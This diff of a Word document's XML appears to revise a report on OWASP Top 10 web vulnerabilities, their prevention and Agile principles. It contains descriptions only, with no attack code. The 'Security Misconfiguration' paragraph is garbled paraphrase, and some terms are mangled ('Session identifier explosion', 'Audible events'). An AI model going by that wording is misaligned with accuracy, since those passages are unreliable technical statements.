-        <w:t xml:space="preserve">Below there are some techniques to prevent </w:t>
-      </w:r>
-      <w:r>
-        <w:t>authentication weaknesses</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>When possible, add some sort of multi-factor authentication. Such as 2FA. Anything to prevent something like brute force attacks.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="23"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Do not ship with default credentials, such as admin/admin</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="23"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Check passwords for weakness.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="23"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Implement a refresh password functionality that employees have to renew their password after let’s say, 30 days.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="23"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Limit login attempts after a number of fails.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop4"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Software and Data Integrity Failures</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>The following techniques might help preventing these failures</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="24"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Use digital signatures to verify that the data is from the source you expected it to come from.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="24"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Make sure libraries and dependencies are ingesting trusted repositories.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="24"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Make sure that your CI/CD pipeline has great separation, configuration and access control to make sure that the integrity of the code flows through the build and deploy. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop4"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Security Logging and Monitoring Failures</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Depending on the risk of the application, below are some techniques that could be implemented.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="25"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Ensure all login, access control, and server-side input validation failures can be logged with sufficient user context to identify suspicious or malicious accounts</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="25"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Make sure that logs are generated in a format that is easily readable.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="25"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Make sure data is encoded properly so that you can prevent injections or attacks in the monitoring system.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop4"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Server-Side Request Forgery</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Developers can prevent SSRF by implementing some or all the following defence</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Network layer:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="26"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Splitting remote resource access functions into separate networks to mitigate the impact of SSRF</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Application layer:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="26"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Clear and validate all client-supplied data submitted.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="26"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Don’t send raw responses to a client.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="26"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Disable HTTP redirections.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop1"/>
-      </w:pPr>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-      <w:bookmarkStart w:id="15" w:name="_Toc114487663"/>
-      <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>What is Agile?</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="15"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">In short, </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Agile is an iterative approach to project management and software development that helps teams deliver value to their customers faster and with fewer headaches. Instead of setting all their sights on a resounding launch, an agile team delivers work in small, but immediately usable, chunks. Requirements, plans and results are continuously evaluated, giving teams a natural mechanism to respond quickly to change.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="16" w:name="_Toc114487664"/>
-      <w:r>
-        <w:t>Agile manifesto</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="16"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">In early 2001, against the backdrop of the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Wasatch</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> Mountains in Snowbird, Utah, United States, 17 people gathered to discuss the future of software development. The problem, they agreed, was that companies were so focused on excessively planning and documenting their software development cycles that they were losing sight of what really mattered: satisfying their customers. Companies may have touted corporate values such as "excellence" and "integrity," but these values did little to help guide people in the right direction, especially software developers. That needed to change. Many of the Snowbird 17 already had ideas about how to usher in the new era of software development. The trip to the mountains was their chance to discuss this in depth.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>The result of this long weekend was the Agile manifesto, consisting of just 68 words. However, the short but very powerful document changed software development forever. In the nearly two decades since the document was created, these words (and the 12 principles that followed) have been embraced (to varying degrees) by countless individuals, teams and companies.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Kop2"/>
-      </w:pPr>
-      <w:bookmarkStart w:id="17" w:name="_Toc114487665"/>
-      <w:r>
-        <w:t>The 12 principles</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="17"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="28"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Early and Continuous Delivery of Valuable Software</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="28"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Embrace Change</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="28"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Frequent Delivery</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="28"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Business and Developers Together</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="28"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Motivated Individuals</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="28"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Face-to-Face Conversation</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="28"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Working Software</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="28"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Sustainable Development</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="28"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Technical Excellence</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="28"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Simplicity</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="28"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>Self-Organizing Teams</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Lijstalinea"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="28"/>
-        </w:numPr>
-      </w:pPr>
-      <w:r>
-        <w:t>R</w:t>
-      </w:r>
-      <w:r>
-        <w:t>egular Reflection and Adjustment</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5613,7 +4815,1541 @@
         </w:rPr>
         <w:t xml:space="preserve">Source: </w:t>
       </w:r>
-      <w:hyperlink r:id="rId14" w:history="1">
+      <w:hyperlink r:id="rId15" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:sz w:val="20"/>
+            <w:szCs w:val="20"/>
+          </w:rPr>
+          <w:t>https://en.wikipedia.org/wiki/SQL_injection</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Cross-site scripting</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Cross-site scripting (XSS) refers to a vulnerability that gives hackers an opening to insert client-side scripts inside a page. This is then used to gain access to critical data directly. XSS can also be used by a hacker to pretend to be another user or to fool a user into disclosing crucial information.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Source: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId16" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:sz w:val="20"/>
+            <w:szCs w:val="20"/>
+          </w:rPr>
+          <w:t>https://portswigger.net/web-security/cross-site-scripting</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Remote File Inclusion</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>With remote file inclusion, an attacker references external scripts using vulnerabilities in a web application. The attacker can then attempt to use the referencing function within an application to upload malware. These types of malware are also referred to as backdoor shells. All this is done from a different Uniform Resource Locator (URL) within a separate domain.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Source: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId17" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:sz w:val="20"/>
+            <w:szCs w:val="20"/>
+          </w:rPr>
+          <w:t>https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Password Breach</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Breaching a user’s password is a common technique to gain access to web resources. In many cases, the hacker will use a password that the user or administrator had used to log in to another site for which the hacker has a list of login credentials.|</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">In other cases, hackers use a technique called password spraying, in which they use common passwords like "12345678" or "password123," and try them out one after the other until they gain </w:t>
+      </w:r>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>access. There are several other techniques like keyloggers or simply finding your password written down and using it.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Source: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId18" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:sz w:val="20"/>
+            <w:szCs w:val="20"/>
+          </w:rPr>
+          <w:t>https://avatao.com/blog-best-practices-to-prevent-a-password-breach/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Code Injection</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Code injection involves an attacker using an input validation vulnerability in a computer’s software system to introduce and run malicious code. This code then proceeds to make changes to how the software and computer work.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Broken access control</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>This is a policy so that normal users cannot break the website with permissions they should not be allowed to use. Instead they should face an alert that says that they’re unauthorized to do this action.</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>This can be done by for example: parameter tampering in the URL or force browsing.</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>Accessing the API methods with missing access controls.</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>Manipulation of metadata when using a JSON web token.</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>CORS misconfiguration (Cross-Origin Resource Sharing)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Source: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId19" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:sz w:val="20"/>
+            <w:szCs w:val="20"/>
+          </w:rPr>
+          <w:t>https://owasp.org/Top10/A01_2021-Broken_Access_Control/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Security Misconfiguration</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The application might be powerless assuming that it misses the mark on security solidifying on at least one parts of the application or cloud administration. Regardless of whether pointless highlights are on that shouldn't (yet) be underway. A default administrator account actually empowered with default username and secret phrase. Delicate mistake messages are still on, permitting a programmer to look into the frameworks.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Source: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId20" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:sz w:val="20"/>
+            <w:szCs w:val="20"/>
+          </w:rPr>
+          <w:t>https://owasp.org/Top10/A05_2021-Security_Misconfiguration/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Vulnerable and Outdated Components</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>We all have seen a website which has outdated plugins or core systems. These are more vulnerable to hackers if they know how to hack that version of the core system and/or plugin.</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>They will be left outdated if you don’t know the current version(s) and i</w:t>
+      </w:r>
+      <w:r>
+        <w:t>f you do not fix or upgrade the underlying platform, frameworks, and dependencies in a risk-based, timely fashion.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Source: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId21" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:sz w:val="20"/>
+            <w:szCs w:val="20"/>
+          </w:rPr>
+          <w:t>https://owasp.org/Top10/A06_2021-Vulnerable_and_Outdated_Components/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Identification and Authentication Failures</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>It is important to verify a user's identity during login and/or registration authentication. Protect against authentication-related attacks. A data breach refers to the disclosure of sensitive or confidential information. Data breaches can occur accidentally, but are often perpetrated by hackers with the intent to use or sell data.</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>Examples of attacks can be:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="16"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Brute force attacks (on login)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="16"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Default, or weak passwords (like admin or test123)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="16"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Weak processes to recover a password</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> (lost password)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="16"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Weakly hashed passwords or sensitive data</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="16"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Session identifier explosion in URL</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Source: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId22" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:sz w:val="20"/>
+            <w:szCs w:val="20"/>
+          </w:rPr>
+          <w:t>https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop4"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Software and Data Integrity Failures</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>These type of failures can occur when a piece of software relies on plugins and/or libraries from untrusted sources. Pipelines, repositories can introduce potential unauthorized access.</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t xml:space="preserve">Also, many libraries and plugins have an auto-update functionality build into them with insufficient verification and testing to apply to a running </w:t>
+      </w:r>
+      <w:r>
+        <w:t>piece of software.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Source: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId23" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:sz w:val="20"/>
+            <w:szCs w:val="20"/>
+          </w:rPr>
+          <w:t>https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures/</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Kop4"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Security Logging and Monitoring Failures</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>By monitoring fails by uses in a software system it is easy to track down possible vulnerabilities in your system. With the following events, your system has a possibility to certain vulnerabilities.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="18"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Audible events are not logged</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="18"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Login</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="18"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Login fails</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="18"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>High value transactions</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="18"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Warnings generate unclear messages</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="18"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Logs of full-stack applications are not monitored for strange activity</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Lijstalinea"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="18"/>
+        </w:numPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Those logs are only stored locally</w:t>
+      </w:r>
+    </w:p>
